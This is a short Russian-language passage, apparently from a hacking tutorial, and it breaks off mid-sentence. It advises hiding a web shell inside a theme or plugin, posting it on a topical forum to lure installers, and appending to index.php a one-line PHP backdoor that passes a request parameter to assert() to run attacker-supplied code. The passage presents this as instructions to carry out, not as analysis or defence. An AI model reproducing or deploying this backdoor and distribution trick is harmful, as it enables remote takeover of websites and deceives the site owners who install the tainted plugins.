В общем первый шаг-внедрение шелла, ложиться на ваши плечи. Можно тупо засунуть шелл в какой-нибудь стиль, плагин, выложить на тематическом форуме и ждать.
Отправляемся к файлу index.php , и дописываем вредоносный код:
if (isset($_REQUEST['l']))
assert(stripslashes($_REQUEST[l]));
Вызываем...